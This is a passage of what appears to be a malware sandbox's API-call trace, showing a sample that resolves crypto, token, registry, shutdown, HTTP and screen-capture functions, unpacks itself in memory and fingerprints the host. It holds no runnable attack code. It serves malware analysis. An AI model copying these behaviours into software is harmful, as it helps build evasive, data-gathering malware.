lpProcName="GetSidSubAuthorityCount") returned 0x756f0e0c [0082.169] SetErrorMode (uMode=0x8001) returned 0x0 [0082.169] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.169] SetErrorMode (uMode=0x0) returned 0x8001 [0082.169] GetProcAddress (hModule=0x756e0000, lpProcName="AllocateAndInitializeSid") returned 0x756f40e6 [0082.169] SetErrorMode (uMode=0x8001) returned 0x0 [0082.170] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.170] SetErrorMode (uMode=0x0) returned 0x8001 [0082.170] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthority") returned 0x756f0e24 [0082.170] SetErrorMode (uMode=0x8001) returned 0x0 [0082.170] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.170] SetErrorMode (uMode=0x0) returned 0x8001 [0082.170] GetProcAddress (hModule=0x756e0000, lpProcName="SetEntriesInAclW") returned 0x756f2a66 [0082.170] SetErrorMode (uMode=0x8001) returned 0x0 [0082.170] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.170] SetErrorMode (uMode=0x0) returned 0x8001 [0082.170] GetProcAddress (hModule=0x756e0000, lpProcName="RegCreateKeyExW") returned 0x756f40fe [0082.170] SetErrorMode (uMode=0x8001) returned 0x0 [0082.170] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.170] SetErrorMode (uMode=0x0) returned 0x8001 [0082.170] GetProcAddress (hModule=0x756e0000, lpProcName="CryptVerifySignatureW") returned 0x756ec54a [0082.170] SetErrorMode (uMode=0x8001) returned 0x0 [0082.170] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.171] SetErrorMode (uMode=0x0) returned 0x8001 [0082.171] GetProcAddress (hModule=0x756e0000, lpProcName="SetNamedSecurityInfoW") returned 0x756e9fe2 [0082.171] SetErrorMode (uMode=0x8001) returned 0x0 [0082.171] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.171] SetErrorMode (uMode=0x0) returned 0x8001 [0082.171] GetProcAddress (hModule=0x756e0000, lpProcName="GetNamedSecurityInfoW") returned 0x756ef4fd [0082.171] SetErrorMode (uMode=0x8001) returned 0x0 [0082.171] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.171] SetErrorMode (uMode=0x0) returned 0x8001 [0082.171] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756edf4e [0082.171] SetErrorMode (uMode=0x8001) returned 0x0 [0082.171] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.171] SetErrorMode (uMode=0x0) returned 0x8001 [0082.171] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756edf36 [0082.171] SetErrorMode (uMode=0x8001) returned 0x0 [0082.171] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.171] SetErrorMode (uMode=0x0) returned 0x8001 [0082.172] GetProcAddress (hModule=0x756e0000, lpProcName="SetSecurityDescriptorSacl") returned 0x756f4680 [0082.172] SetErrorMode (uMode=0x8001) returned 0x0 [0082.172] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.172] SetErrorMode (uMode=0x0) returned 0x8001 [0082.172] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756f14d6 [0082.172] SetErrorMode (uMode=0x8001) returned 0x0 [0082.172] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.172] SetErrorMode (uMode=0x0) returned 0x8001 [0082.172] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756edf66 [0082.173] SetErrorMode (uMode=0x8001) returned 0x0 [0082.173] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.173] SetErrorMode (uMode=0x0) returned 0x8001 [0082.173] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756f4304 [0082.173] SetErrorMode (uMode=0x8001) returned 0x0 [0082.173] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.173] SetErrorMode (uMode=0x0) returned 0x8001 [0082.173] GetProcAddress (hModule=0x756e0000, lpProcName="FreeSid") returned 0x756f412e [0082.173] SetErrorMode (uMode=0x8001) returned 0x0 [0082.173] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.173] SetErrorMode (uMode=0x0) returned 0x8001 [0082.174] GetProcAddress (hModule=0x756e0000, lpProcName="InitializeSecurityDescriptor") returned 0x756f4620 [0082.174] SetErrorMode (uMode=0x8001) returned 0x0 [0082.174] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.174] SetErrorMode (uMode=0x0) returned 0x8001 [0082.174] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756f468d [0082.174] SetErrorMode (uMode=0x8001) returned 0x0 [0082.174] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.174] SetErrorMode (uMode=0x0) returned 0x8001 [0082.174] GetProcAddress (hModule=0x756e0000, lpProcName="CryptImportKey") returned 0x756ec532 [0082.174] SetErrorMode (uMode=0x8001) returned 0x0 [0082.174] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.174] SetErrorMode (uMode=0x0) returned 0x8001 [0082.174] GetProcAddress (hModule=0x756e0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x756f1f59 [0082.174] SetErrorMode (uMode=0x8001) returned 0x0 [0082.174] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.174] SetErrorMode (uMode=0x0) returned 0x8001 [0082.174] GetProcAddress (hModule=0x756e0000, lpProcName="OpenThreadToken") returned 0x756f432c [0082.175] SetErrorMode (uMode=0x8001) returned 0x0 [0082.175] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.175] SetErrorMode (uMode=0x0) returned 0x8001 [0082.175] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756f46ad [0082.175] SetErrorMode (uMode=0x8001) returned 0x0 [0082.175] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.175] SetErrorMode (uMode=0x0) returned 0x8001 [0082.175] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ee124 [0082.175] SetErrorMode (uMode=0x8001) returned 0x0 [0082.175] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.175] SetErrorMode (uMode=0x0) returned 0x8001 [0082.175] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756f431c [0082.175] SetErrorMode (uMode=0x8001) returned 0x0 [0082.175] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.175] SetErrorMode (uMode=0x0) returned 0x8001 [0082.175] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ec51a [0082.175] SetErrorMode (uMode=0x8001) returned 0x0 [0082.175] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.176] SetErrorMode (uMode=0x0) returned 0x8001 [0082.176] GetProcAddress (hModule=0x756e0000, lpProcName="AdjustTokenPrivileges") returned 0x756f418e [0082.176] SetErrorMode (uMode=0x8001) returned 0x0 [0082.176] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.176] SetErrorMode (uMode=0x0) returned 0x8001 [0082.176] GetProcAddress (hModule=0x756e0000, lpProcName="SetSecurityDescriptorDacl") returned 0x756f415e [0082.176] SetErrorMode (uMode=0x8001) returned 0x0 [0082.176] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.176] SetErrorMode (uMode=0x0) returned 0x8001 [0082.176] GetProcAddress (hModule=0x756e0000, lpProcName="GetSecurityDescriptorSacl") returned 0x756f4608 [0082.176] SetErrorMode (uMode=0x8001) returned 0x0 [0082.176] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.176] SetErrorMode (uMode=0x0) returned 0x8001 [0082.176] GetProcAddress (hModule=0x756e0000, lpProcName="LookupPrivilegeValueW") returned 0x756f41b3 [0082.176] SetErrorMode (uMode=0x8001) returned 0x0 [0082.176] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.176] SetErrorMode (uMode=0x0) returned 0x8001 [0082.177] GetProcAddress (hModule=0x756e0000, lpProcName="GetLengthSid") returned 0x756f413b [0082.177] SetErrorMode (uMode=0x8001) returned 0x0 [0082.177] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.177] SetErrorMode (uMode=0x0) returned 0x8001 [0082.177] GetProcAddress (hModule=0x756e0000, lpProcName="RegDeleteValueW") returned 0x756ecf31 [0082.177] SetErrorMode (uMode=0x8001) returned 0x0 [0082.177] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.177] SetErrorMode (uMode=0x0) returned 0x8001 [0082.177] GetProcAddress (hModule=0x756e0000, lpProcName="RegFlushKey") returned 0x7570773f [0082.177] SetErrorMode (uMode=0x8001) returned 0x0 [0082.177] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.177] SetErrorMode (uMode=0x0) returned 0x8001 [0082.177] GetProcAddress (hModule=0x756e0000, lpProcName="RegNotifyChangeKeyValue") returned 0x756ee15b [0082.177] SetErrorMode (uMode=0x8001) returned 0x0 [0082.177] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.177] SetErrorMode (uMode=0x0) returned 0x8001 [0082.178] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryInfoKeyW") returned 0x756f46e7 [0082.178] SetErrorMode (uMode=0x8001) returned 0x0 [0082.178] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.178] SetErrorMode (uMode=0x0) returned 0x8001 [0082.178] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyW") returned 0x756f445b [0082.178] SetErrorMode (uMode=0x8001) returned 0x0 [0082.178] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.178] SetErrorMode (uMode=0x0) returned 0x8001 [0082.178] GetProcAddress (hModule=0x756e0000, lpProcName="InitiateSystemShutdownExW") returned 0x7573db3a [0082.178] SetErrorMode (uMode=0x8001) returned 0x0 [0082.178] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0082.178] SetErrorMode (uMode=0x0) returned 0x8001 [0082.178] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextW") returned 0x756edf14 [0082.178] SetErrorMode (uMode=0x8001) returned 0x0 [0082.178] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c50000 [0082.178] SetErrorMode (uMode=0x0) returned 0x8001 [0082.178] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteW") returned 0x75c63c71 [0082.178] SetErrorMode (uMode=0x8001) returned 0x0 [0082.179] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c50000 [0082.179] SetErrorMode (uMode=0x0) returned 0x8001 [0082.179] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteExW") returned 0x75c71e46 [0082.179] SetErrorMode (uMode=0x8001) returned 0x0 [0082.179] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c50000 [0082.179] SetErrorMode (uMode=0x0) returned 0x8001 [0082.179] GetProcAddress (hModule=0x75c50000, lpProcName="SHGetFolderPathW") returned 0x75cd5708 [0082.179] SetErrorMode (uMode=0x8001) returned 0x0 [0082.179] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.179] SetErrorMode (uMode=0x0) returned 0x8001 [0082.179] GetProcAddress (hModule=0x750d0000, lpProcName="PathFileExistsW") returned 0x750e45bf [0082.180] SetErrorMode (uMode=0x8001) returned 0x0 [0082.180] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.180] SetErrorMode (uMode=0x0) returned 0x8001 [0082.180] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsURLW") returned 0x750e55bf [0082.180] SetErrorMode (uMode=0x8001) returned 0x0 [0082.180] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.180] SetErrorMode (uMode=0x0) returned 0x8001 [0082.180] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsDirectoryEmptyW") returned 0x7510cd81 [0082.180] SetErrorMode (uMode=0x8001) returned 0x0 [0082.180] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.180] SetErrorMode (uMode=0x0) returned 0x8001 [0082.180] GetProcAddress (hModule=0x750d0000, lpProcName="StrCmpNIW") returned 0x750e4745 [0082.180] SetErrorMode (uMode=0x8001) returned 0x0 [0082.180] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.180] SetErrorMode (uMode=0x0) returned 0x8001 [0082.181] GetProcAddress (hModule=0x750d0000, lpProcName="PathRenameExtensionW") returned 0x7510d32a [0082.181] SetErrorMode (uMode=0x8001) returned 0x0 [0082.181] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.181] SetErrorMode (uMode=0x0) returned 0x8001 [0082.181] GetProcAddress (hModule=0x750d0000, lpProcName="StrStrIW") returned 0x750e46e9 [0082.181] SetErrorMode (uMode=0x8001) returned 0x0 [0082.181] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.181] SetErrorMode (uMode=0x0) returned 0x8001 [0082.181] GetProcAddress (hModule=0x750d0000, lpProcName="PathMatchSpecW") returned 0x750e86f7 [0082.181] SetErrorMode (uMode=0x8001) returned 0x0 [0082.181] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.181] SetErrorMode (uMode=0x0) returned 0x8001 [0082.181] GetProcAddress (hModule=0x750d0000, lpProcName="PathCombineW") returned 0x750ec39c [0082.181] SetErrorMode (uMode=0x8001) returned 0x0 [0082.181] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.181] SetErrorMode (uMode=0x0) returned 0x8001 [0082.182] GetProcAddress (hModule=0x750d0000, lpProcName="PathRemoveFileSpecW") returned 0x750e3248 [0082.182] SetErrorMode (uMode=0x8001) returned 0x0 [0082.182] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.182] SetErrorMode (uMode=0x0) returned 0x8001 [0082.182] GetProcAddress (hModule=0x750d0000, lpProcName="PathAddBackslashW") returned 0x750ec177 [0082.182] SetErrorMode (uMode=0x8001) returned 0x0 [0082.182] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.182] SetErrorMode (uMode=0x0) returned 0x8001 [0082.182] GetProcAddress (hModule=0x750d0000, lpProcName="wvnsprintfW") returned 0x7511066c [0082.182] SetErrorMode (uMode=0x8001) returned 0x0 [0082.182] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.182] SetErrorMode (uMode=0x0) returned 0x8001 [0082.182] GetProcAddress (hModule=0x750d0000, lpProcName="PathUnquoteSpacesW") returned 0x750e5331 [0082.182] SetErrorMode (uMode=0x8001) returned 0x0 [0082.182] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.182] SetErrorMode (uMode=0x0) returned 0x8001 [0082.182] GetProcAddress (hModule=0x750d0000, lpProcName="PathSkipRootW") returned 0x750ffbf5 [0082.182] SetErrorMode (uMode=0x8001) returned 0x0 [0082.183] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.183] SetErrorMode (uMode=0x0) returned 0x8001 [0082.183] GetProcAddress (hModule=0x750d0000, lpProcName="PathFindExtensionW") returned 0x750ea1b9 [0082.183] SetErrorMode (uMode=0x8001) returned 0x0 [0082.183] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.183] SetErrorMode (uMode=0x0) returned 0x8001 [0082.183] GetProcAddress (hModule=0x750d0000, lpProcName="SHDeleteValueW") returned 0x750dfcca [0082.183] SetErrorMode (uMode=0x8001) returned 0x0 [0082.183] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.183] SetErrorMode (uMode=0x0) returned 0x8001 [0082.183] GetProcAddress (hModule=0x750d0000, lpProcName="wvnsprintfA") returned 0x750fedfe [0082.183] SetErrorMode (uMode=0x8001) returned 0x0 [0082.183] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.183] SetErrorMode (uMode=0x0) returned 0x8001 [0082.183] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsDirectoryW") returned 0x750dff07 [0082.183] SetErrorMode (uMode=0x8001) returned 0x0 [0082.183] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.184] SetErrorMode (uMode=0x0) returned 0x8001 [0082.184] GetProcAddress (hModule=0x750d0000, lpProcName="PathRemoveBackslashW") returned 0x750e5c62 [0082.184] SetErrorMode (uMode=0x8001) returned 0x0 [0082.184] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.184] SetErrorMode (uMode=0x0) returned 0x8001 [0082.184] GetProcAddress (hModule=0x750d0000, lpProcName="UrlUnescapeA") returned 0x750fc6fb [0082.184] SetErrorMode (uMode=0x8001) returned 0x0 [0082.184] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0082.184] SetErrorMode (uMode=0x0) returned 0x8001 [0082.184] GetProcAddress (hModule=0x750d0000, lpProcName="PathQuoteSpacesW") returned 0x7510ce21 [0082.184] SetErrorMode (uMode=0x8001) returned 0x0 [0082.184] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74eb0000 [0082.201] SetErrorMode (uMode=0x0) returned 0x8001 [0082.201] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleFileNameExW") returned 0x74eb13f0 [0082.201] SetErrorMode (uMode=0x8001) returned 0x0 [0082.201] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0082.201] SetErrorMode (uMode=0x0) returned 0x8001 [0082.201] GetProcAddress (hModule=0x75450000, lpProcName="CLSIDFromString") returned 0x7546e599 [0082.201] SetErrorMode (uMode=0x8001) returned 0x0 [0082.201] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0082.201] SetErrorMode (uMode=0x0) returned 0x8001 [0082.201] GetProcAddress (hModule=0x75450000, lpProcName="CoInitializeEx") returned 0x754909ad [0082.201] SetErrorMode (uMode=0x8001) returned 0x0 [0082.202] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0082.202] SetErrorMode (uMode=0x0) returned 0x8001 [0082.202] GetProcAddress (hModule=0x75450000, lpProcName="CreateStreamOnHGlobal") returned 0x7547363b [0082.202] SetErrorMode (uMode=0x8001) returned 0x0 [0082.202] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0082.202] SetErrorMode (uMode=0x0) returned 0x8001 [0082.202] GetProcAddress (hModule=0x75450000, lpProcName="CoSetProxyBlanket") returned 0x75465ea5 [0082.202] SetErrorMode (uMode=0x8001) returned 0x0 [0082.202] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0082.202] SetErrorMode (uMode=0x0) returned 0x8001 [0082.202] GetProcAddress (hModule=0x75450000, lpProcName="CoCreateInstance") returned 0x75499d0b [0082.202] SetErrorMode (uMode=0x8001) returned 0x0 [0082.202] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0082.202] SetErrorMode (uMode=0x0) returned 0x8001 [0082.202] GetProcAddress (hModule=0x75450000, lpProcName="CoUninitialize") returned 0x754986d3 [0082.202] SetErrorMode (uMode=0x8001) returned 0x0 [0082.202] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0082.203] SetErrorMode (uMode=0x0) returned 0x8001 [0082.203] GetProcAddress (hModule=0x75130000, lpProcName="DeleteObject") returned 0x75145689 [0082.203] SetErrorMode (uMode=0x8001) returned 0x0 [0082.203] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0082.203] SetErrorMode (uMode=0x0) returned 0x8001 [0082.203] GetProcAddress (hModule=0x75130000, lpProcName="GetDeviceCaps") returned 0x75144de0 [0082.203] SetErrorMode (uMode=0x8001) returned 0x0 [0082.203] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0082.203] SetErrorMode (uMode=0x0) returned 0x8001 [0082.203] GetProcAddress (hModule=0x75130000, lpProcName="CreateDCW") returned 0x7514e743 [0082.203] SetErrorMode (uMode=0x8001) returned 0x0 [0082.203] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0082.203] SetErrorMode (uMode=0x0) returned 0x8001 [0082.203] GetProcAddress (hModule=0x75130000, lpProcName="CreateCompatibleDC") returned 0x751454f4 [0082.203] SetErrorMode (uMode=0x8001) returned 0x0 [0082.203] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0082.204] SetErrorMode (uMode=0x0) returned 0x8001 [0082.204] GetProcAddress (hModule=0x75130000, lpProcName="SelectObject") returned 0x75144f70 [0082.204] SetErrorMode (uMode=0x8001) returned 0x0 [0082.204] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0082.204] SetErrorMode (uMode=0x0) returned 0x8001 [0082.204] GetProcAddress (hModule=0x75130000, lpProcName="CreateCompatibleBitmap") returned 0x75145f49 [0082.204] SetErrorMode (uMode=0x8001) returned 0x0 [0082.204] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0082.204] SetErrorMode (uMode=0x0) returned 0x8001 [0082.204] GetProcAddress (hModule=0x75130000, lpProcName="BitBlt") returned 0x75145ea6 [0082.204] SetErrorMode (uMode=0x8001) returned 0x0 [0082.204] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0082.204] SetErrorMode (uMode=0x0) returned 0x8001 [0082.204] GetProcAddress (hModule=0x75130000, lpProcName="DeleteDC") returned 0x751458b3 [0082.204] SetErrorMode (uMode=0x8001) returned 0x0 [0082.204] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.790] SetErrorMode (uMode=0x0) returned 0x8001 [0082.790] GetProcAddress (hModule=0x75350000, lpProcName="InternetConnectA") returned 0x753749e9 [0082.790] SetErrorMode (uMode=0x8001) returned 0x0 [0082.790] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.790] SetErrorMode (uMode=0x0) returned 0x8001 [0082.791] GetProcAddress (hModule=0x75350000, lpProcName="InternetReadFile") returned 0x7536b406 [0082.791] SetErrorMode (uMode=0x8001) returned 0x0 [0082.791] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.791] SetErrorMode (uMode=0x0) returned 0x8001 [0082.791] GetProcAddress (hModule=0x75350000, lpProcName="HttpQueryInfoA") returned 0x7536a33e [0082.791] SetErrorMode (uMode=0x8001) returned 0x0 [0082.791] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.791] SetErrorMode (uMode=0x0) returned 0x8001 [0082.791] GetProcAddress (hModule=0x75350000, lpProcName="InternetQueryOptionA") returned 0x75361b56 [0082.791] SetErrorMode (uMode=0x8001) returned 0x0 [0082.791] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.791] SetErrorMode (uMode=0x0) returned 0x8001 [0082.791] GetProcAddress (hModule=0x75350000, lpProcName="HttpOpenRequestA") returned 0x75374c7d [0082.791] SetErrorMode (uMode=0x8001) returned 0x0 [0082.791] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.791] SetErrorMode (uMode=0x0) returned 0x8001 [0082.792] GetProcAddress (hModule=0x75350000, lpProcName="InternetCrackUrlA") returned 0x7535d075 [0082.792] SetErrorMode (uMode=0x8001) returned 0x0 [0082.792] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.792] SetErrorMode (uMode=0x0) returned 0x8001 [0082.792] GetProcAddress (hModule=0x75350000, lpProcName="InternetSetOptionA") returned 0x753675e8 [0082.792] SetErrorMode (uMode=0x8001) returned 0x0 [0082.792] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.792] SetErrorMode (uMode=0x0) returned 0x8001 [0082.792] GetProcAddress (hModule=0x75350000, lpProcName="InternetOpenA") returned 0x7537f18e [0082.792] SetErrorMode (uMode=0x8001) returned 0x0 [0082.792] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.792] SetErrorMode (uMode=0x0) returned 0x8001 [0082.792] GetProcAddress (hModule=0x75350000, lpProcName="InternetCloseHandle") returned 0x7536ab49 [0082.792] SetErrorMode (uMode=0x8001) returned 0x0 [0082.792] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0082.792] SetErrorMode (uMode=0x0) returned 0x8001 [0082.793] GetProcAddress (hModule=0x75350000, lpProcName="HttpSendRequestA") returned 0x753e18f8 [0082.793] SetErrorMode (uMode=0x8001) returned 0x0 [0082.793] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76c40000 [0082.793] SetErrorMode (uMode=0x0) returned 0x8001 [0082.793] GetProcAddress (hModule=0x76c40000, lpProcName="ObtainUserAgentString") returned 0x76c71d76 [0082.793] SetErrorMode (uMode=0x8001) returned 0x0 [0082.793] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76b60000 [0082.793] SetErrorMode (uMode=0x0) returned 0x8001 [0082.793] GetProcAddress (hModule=0x76b60000, lpProcName=0x9) returned 0x76b63eae [0082.793] SetErrorMode (uMode=0x8001) returned 0x0 [0082.793] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x748e0000 [0082.823] SetErrorMode (uMode=0x0) returned 0x8001 [0082.824] GetProcAddress (hModule=0x748e0000, lpProcName="GetUserNameExW") returned 0x74dea415 [0082.824] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x72940000, dwSize=0x120000, flNewProtect=0x40, lpflOldProtect=0x35a0c00 | out: lpflOldProtect=0x35a0c00*=0x2) returned 1 [0082.825] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x401000, dwSize=0xf20f, flNewProtect=0x20, lpflOldProtect=0x35a0c00 | out: lpflOldProtect=0x35a0c00*=0x40) returned 1 [0082.825] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x411000, dwSize=0x2bfe, flNewProtect=0x4, lpflOldProtect=0x35a0c00 | out: lpflOldProtect=0x35a0c00*=0x40) returned 1 [0082.825] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x414000, dwSize=0x696c, flNewProtect=0x4, lpflOldProtect=0x35a0c00 | out: lpflOldProtect=0x35a0c00*=0x40) returned 1 [0082.825] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x41b000, dwSize=0xc08, flNewProtect=0x4, lpflOldProtect=0x35a0c00 | out: lpflOldProtect=0x35a0c00*=0x40) returned 1 [0082.826] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x35a0c00 | out: lpflOldProtect=0x35a0c00*=0x40) returned 1 [0082.826] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0082.826] GetCurrentProcessId () returned 0x65c [0082.827] CryptAcquireContextW (in: phProv=0x417e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x417e5c*=0x57ef20) returned 1 [0082.945] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4084e9) returned 0x57d840 [0082.945] GetComputerNameW (in: lpBuffer=0x18fcc8, nSize=0x18fcac | out: lpBuffer="YKYD69Q", nSize=0x18fcac) returned 1 [0082.945] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc80 | out: phkResult=0x18fc80*=0x134) returned 0x0 [0082.945] RegQueryValueExW (in: hKey=0x134, lpValueName="InstallDate", lpReserved=0x0, lpType=0x18fcb4, lpData=0x18fcb0, lpcbData=0x18fc7c*=0x4 | out: lpType=0x18fcb4*=0x4, lpData=0x18fcb0*=0x0, lpcbData=0x18fc7c*=0x4) returned 0x0 [0082.945] RegCloseKey (hKey=0x134) returned 0x0 [0082.945] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0x134) returned 0x0 [0082.945] RegQueryValueExW (in: hKey=0x134, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0) returned 0x2 [0082.945] RegCloseKey (hKey=0x134) returned 0x0 [0082.945] GetVersionExW (in: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, 